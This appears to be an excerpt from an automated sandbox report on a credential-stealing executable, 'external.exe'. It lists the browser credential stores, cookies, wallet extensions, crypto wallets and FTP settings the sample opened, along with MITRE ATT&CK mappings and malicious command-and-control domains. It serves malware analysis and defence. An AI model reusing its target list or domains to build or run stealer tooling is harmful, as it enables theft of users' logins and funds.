                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Roaming\Binance
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                Source: C:\Users\user\Desktop\external.exe | Directory queried: C:\Users\user\Documents\NWTVCDUMOB
                Source: C:\Users\user\Desktop\external.exe | Directory queried: C:\Users\user\Documents\ONBQCLYSPU
                Source: C:\Users\user\Desktop\external.exe | Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
                Source: C:\Users\user\Desktop\external.exe | Directory queried: C:\Users\user\Documents
                Source: C:\Users\user\Desktop\external.exe | Directory queried: C:\Users\user\Documents\RAYHIWGKDI
                Source: C:\Users\user\Desktop\external.exe | Directory queried: C:\Users\user\Documents\UMMBDNEQBN
                Source: C:\Users\user\Desktop\external.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: Yara matchFile source: 00000002.00000003.1908135316.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1908103899.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: external.exe PID: 7140, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match | File source: Process Memory Space: external.exe PID: 7140, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK matrix (one line per tactic; the number in parentheses is the report's per-technique signature count):

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
Execution: Windows Management Instrumentation (2), Native API (1), PowerShell (1), Cron, Launchd, Scheduled Task, Systemd Timers
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
Privilege Escalation: Process Injection (211), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
Defense Evasion: Virtualization/Sandbox Evasion (11), Process Injection (211), Deobfuscate/Decode Files or Information (11), Obfuscated Files or Information (3), Software Packing (1), DLL Side-Loading (1), Compile After Delivery
Credential Access: OS Credential Dumping (2), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
Discovery: System Time Discovery (1), Query Registry (1), Security Software Discovery (141), Virtualization/Sandbox Evasion (11), Process Discovery (1), File and Directory Discovery (11), System Information Discovery (33)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
Collection: Screen Capture (1), Archive Collected Data (1), Data from Local System (41), Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
Command and Control: Encrypted Channel (21), Non-Application Layer Protocol (2), Application Layer Protocol (113), Protocol Impersonation, Fallback Channels, Multiband Communication, Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery
Source | Detection | Scanner
external.exe | 37% | Virustotal
external.exe | 100% | Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
wordyfindy.lat | 104.21.19.35 | true | true | | unknown
bellflamre.click | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
wordyfindy.lat | true | | unknown
slipperyloo.lat | true | | unknown
curverpluch.lat | true | | unknown
tentabatte.lat | true | | unknown
manyrestro.lat | true | | unknown
shapestickyr.lat | true | | unknown
talkynicer.lat | true | | unknown
https://wordyfindy.lat/api | true | | unknown
bashfulacid.lat | true | | unknown
bellflamre.click | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://wordyfindy.lat/ff | external.exe, 00000002.00000002.1996417805.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1949009593.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1948658180.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1948789926.0000000000E19000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/ac/?q= | external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg | external.exe, 00000002.00000003.1882863786.0000000003496000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://wordyfindy.lat/api(WA | external.exe, 00000002.00000002.1996332941.0000000000E02000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.microsoft.co | external.exe, 00000002.00000003.1906082479.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905933686.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906598081.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906164389.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906225551.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1907131073.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906343810.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905233843.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905589126.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906695904.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1904880647.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1907028346.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905783044.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906516458.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905681202.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906769458.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905285277.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905128011.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906942409.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905162450.0000000000E19000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417. | external.exe, 00000002.00000003.1882863786.0000000003496000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | external.exe, 00000002.00000003.1725467175.0000000003533000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1859687812.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1725562484.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1725695856.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1860192237.00000000034E7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | external.exe, 00000002.00000003.1725467175.0000000003533000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1859687812.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1725562484.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1725695856.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1860192237.00000000034E7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | external.exe, 00000002.00000003.1882590251.00000000035B7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://wordyfindy.lat:443/api | external.exe, 00000002.00000002.1996069207.0000000000D62000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://wordyfindy.lat/ | external.exe, external.exe, 00000002.00000003.1935721640.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000002.1996417805.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1949098111.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1908135316.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1908263805.0000000000DF9000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000002.1996069207.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1986440657.0000000000DF9000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1932697450.0000000000DEF000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000002.1996281365.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1932578761.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1948722276.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1908103899.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://crl.mi | external.exe, 00000002.00000003.1906082479.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905933686.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906598081.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906164389.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906225551.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1907131073.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906343810.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905233843.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905589126.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906695904.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1904880647.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1907028346.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905783044.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906516458.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905681202.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906769458.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 